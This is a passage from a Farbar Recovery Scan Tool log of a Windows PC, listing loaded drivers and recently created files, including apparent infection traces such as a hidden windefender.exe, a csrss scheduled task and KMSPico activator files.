S3 glavcam; C:\WINDOWS\system32\DRIVERS\glavcam.sys [1711104 2018-01-09] (GENESYS LOGIC, INC. -> Windows (R) Codename Longhorn DDK provider)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\IPSDefs\20180206.001\IDSvia64.sys [1056920 2017-12-08] (Symantec Corporation -> Symantec Corporation)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [31000 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 Qcamain10x64; C:\WINDOWS\system32\DRIVERS\Qcamain10x64.sys [2412976 2017-04-24] (Qualcomm Atheros -> Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [25368 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [954368 2017-04-11] (Realtek Semiconductor Corp. -> Realtek )
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [782304 2017-04-11] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSP64.SYS [864776 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSPX64.SYS [49672 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 STTub30; C:\WINDOWS\System32\Drivers\STTub30.sys [44184 2012-07-20] (STMicroelectronics -> STMicroelectronics)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SYMEFASI64.SYS [1998552 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SymELAM.sys [25744 2019-05-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100064 2019-04-01] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\Ironx64.SYS [315912 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\symnets.sys [573448 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R3 umbus; C:\WINDOWS\System32\drivers\umbus.sys [56832 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
R3 vjoy; C:\WINDOWS\System32\drivers\vjoy.sys [57976 2017-03-09] (Shaul Eizikovich -> Shaul Eizikovich)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44616 2018-04-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [331680 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [44032 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\wpCtrlDrv.sys [1012120 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S4 SymEvnt; \??\C:\Program Files\Norton Security\NortonData\22.9.2.3\SymPlatform\SymEvnt.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Three months (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-10 17:45 - 2019-06-10 17:45 - 001435136 ____H C:\WINDOWS\windefender.exe
2019-06-10 17:16 - 2019-06-10 17:16 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc
2019-06-10 17:14 - 2019-06-10 17:14 - 000003612 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate
2019-06-10 17:03 - 2019-06-10 17:03 - 007025360 _____ (Malwarebytes) C:\Users\TATTOO NR\Downloads\AdwCleaner.exe
2019-06-10 16:56 - 2019-06-10 16:56 - 000028035 _____ C:\Users\TATTOO NR\Downloads\Addition.zip
2019-06-10 16:36 - 2019-06-10 16:39 - 000141826 _____ C:\Users\TATTOO NR\Downloads\Addition.txt
2019-06-10 16:33 - 2019-06-10 17:55 - 000035887 _____ C:\Users\TATTOO NR\Downloads\FRST.txt
2019-06-10 16:33 - 2019-06-10 16:33 - 002418688 _____ (Farbar) C:\Users\TATTOO NR\Downloads\FRST64.exe
2019-06-10 16:02 - 2019-06-10 17:18 - 000000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2019-06-10 15:53 - 2019-06-10 15:53 - 000000000 ____D C:\WINDOWS\SysWOW64\tijmjrmm
2019-06-10 15:48 - 2019-06-10 15:48 - 000003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2019-06-10 15:48 - 2019-06-10 15:48 - 000000290 __RSH C:\Users\TATTOO NR\ntuser.pol
2019-06-10 15:48 - 2019-06-10 15:48 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2019-06-10 15:31 - 2019-06-10 15:31 - 000002878 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-06-10 15:28 - 2019-06-10 17:17 - 000003390 _____ C:\WINDOWS\System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0}
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\Pader
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\{F9EDCDAB-B9A4-DEF1-DCA4-7252DC432B03}
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\{A55344D9-30D6-824F-AE2D-CC0EAECA955F}
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Program Files\HIXKNY8VO4
2019-06-10 15:26 - 2019-06-10 15:26 - 000000000 ____D C:\Program Files (x86)\EatPizza
2019-06-10 15:25 - 2019-06-10 15:25 - 000000258 __RSH C:\ProgramData\ntuser.pol
2019-06-10 15:24 - 2019-06-10 17:14 - 000003286 _____ C:\WINDOWS\System32\Tasks\csrss
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ___HD C:\WINDOWS\rss
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\App
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\AdvinstAnalytics
2019-06-10 15:23 - 2019-06-10 15:23 - 000000000 ____D C:\Program Files (x86)\KMSPico
2019-06-10 15:17 - 2019-06-10 15:51 - 000000000 ____D C:\Users\TATTOO NR\AppData\LocalLow\uTorrent
2019-06-10 15:17 - 2019-06-10 15:17 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2019-06-10 15:17 - 2019-06-10 15:17 - 000003584 _____ C:\WINDOWS\SECOH-QAD.dll
2019-06-10 15:04 - 2019-06-10 15:04 - 000162537 _____ C:\Users\TATTOO NR\Downloads\kupna zmluva auto.pdf
2019-06-10 09:42 - 2019-06-10 09:42 - 000000000 ____D C:\WINDOWS\System32\Tasks\Remediation
2019-06-10 09:40 - 2019-06-10 09:40 - 000002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002496 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002460 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002459 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002447 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002439 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2019-06-10 09:34 - 2019-06-10 09:34 - 000000110 ____H C:\Users\TATTOO NR\Desktop\depositphotos_221770690-stock-photo-rose-window-neo-gothic-style.jpg.uid-zps
2019-06-07 10:20 - 2019-06-07 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez cfecgw.png.uid-zps
2019-06-06 12:33 - 2019-06-06 12:33 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgjfrtj.jpg.uid-zps
2019-06-04 14:59 - 2019-06-04 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59839268_347941759413581_5544069203016810496_n.jpg.uid-zps
2019-06-04 09:01 - 2019-06-04 09:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\9f42c06c793e3e8a98f330f1ef9fcd76.jpg.uid-zps
2019-06-03 09:07 - 2019-06-03 09:07 - 000000110 ____H C:\Users\TATTOO NR\Desktop\beautiful-bloom-blooming-658687 (1).jpg.uid-zps
2019-06-03 09:03 - 2019-06-03 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Natural-Rose.jpg.uid-zps
2019-05-31 09:11 - 2019-05-31 09:11 - 000000110 ____H C:\Users\TATTOO NR\Desktop\SRAM_EX1_UH.jpg.uid-zps
2019-05-30 16:26 - 2019-05-30 16:26 - 000000110 ____H C:\Users\TATTOO NR\Desktop\61543348_682086725557581_6099366821796773888_n.jpg.uid-zps
2019-05-30 09:06 - 2019-05-30 09:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\ffff.jpg.uid-zps
2019-05-27 09:14 - 2019-05-27 09:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\1_NPl8IDrkOHaILlhr7lLI5Q@2x.jpeg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Chester-Bennington-Drawing.jpg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\19212-chester-bennington-screaming-hd-wallpaper.jpg.uid-zps
2019-05-23 09:52 - 2019-05-23 09:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48368327_211082393154894_908574033384046592_n.jpg.uid-zps
2019-05-21 14:59 - 2019-05-21 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\60158295_706204403153531_1740009122692071424_n.jpg.uid-zps
2019-05-20 09:35 - 2019-05-20 09:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\opravena ospravdlk – kópia.jpg.uid-zps
2019-05-15 10:05 - 2019-05-03 08:31 - 007519888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:18 - 006569344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:12 - 025855488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 14:14 - 000790208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 14:13 - 001376472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-15 10:04 - 2019-05-03 14:13 - 000396088 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2019-05-15 10:04 - 2019-05-03 13:55 - 000123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:54 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:52 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-05-15 10:04 - 2019-05-03 13:51 - 003613696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-15 10:04 - 2019-05-03 13:51 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 004054528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 001288704 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000488448 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:43 - 001027008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-15 10:04 - 2019-05-03 13:43 - 000662328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 13:30 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:30 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:28 - 002882048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2019-05-15 10:04 - 2019-05-03 13:28 - 000089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2019-05-15 10:04 - 2019-05-03 13:27 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:26 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 004055040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 001471488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 08:43 - 000177128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2019-05-15 10:04 - 2019-05-03 08:36 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-15 10:04 - 2019-05-03 08:34 - 000159864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 005625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 001219896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 001027384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000709720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000568104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000063072 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000793640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000776784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000493880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000438984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000170296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000164664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 009084432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 007436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 002811192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 002771256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 001459328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001260480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 001141224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000983632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 000545808 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 000115728 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000434704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000384976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000192016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000146920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:19 - 006043712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000665224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000056288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 002258640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 001130568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:10 - 022017024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 08:05 - 022716416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 019401216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 004866048 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-05-15 10:04 - 2019-05-03 08:01 - 008189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 003400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 007593472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 005788672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 003710976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-05-15 10:04 - 2019-05-03 07:59 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 002175488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2019-05-15 10:04 - 2019-05-03 07:58 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2019-05-15 10:04 - 2019-05-03 07:57 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001560576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001295872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 005350912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 001803776 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000333824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 003090432 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2019-05-15 10:04 - 2019-05-03 07:55 - 002166784 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-15 10:04 - 2019-05-03 07:55 - 000659968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 004929024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 001097728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2019-05-15 10:04 - 2019-05-03 07:54 - 000961024 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-15 10:04 - 2019-05-03 07:54 - 000776192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000543744 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000535552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000507392 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgeIso.dll
2019-05-15 10:04 - 2019-05-03 07:54 - 000251904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2019-05-15 10:04 - 2019-05-03 07:53 - 000204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2019-05-15 10:04 - 2019-05-03 07:53 - 000181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2019-05-15 10:04 - 2019-05-03 06:38 - 000001310 _____ C:\WINDOWS\system32\tcbres.wim
2019-05-15 10:04 - 2019-04-23 09:13 - 001008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-23 08:14 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MixedRealityCapture.dll
2019-05-15 10:04 - 2019-04-19 12:55 - 001634920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 12:54 - 000720200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2019-05-15 10:04 - 2019-04-19 12:40 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2019-05-15 10:04 - 2019-04-19 12:39 - 012754944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-05-15 10:04 - 2019-04-19 12:38 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-15 10:04 - 2019-04-19 12:38 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfproc.dll
2019-05-15 10:04 - 2019-04-19 12:36 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-15 10:04 - 2019-04-19 12:34 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2019-05-15 10:04 - 2019-04-19 11:44 - 001454648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-15 10:04 - 2019-04-19 11:37 - 000607960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2019-05-15 10:04 - 2019-04-19 11:30 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfproc.dll
2019-05-15 10:04 - 2019-04-19 11:28 - 011940864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-15 10:04 - 2019-04-19 11:26 - 002405888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
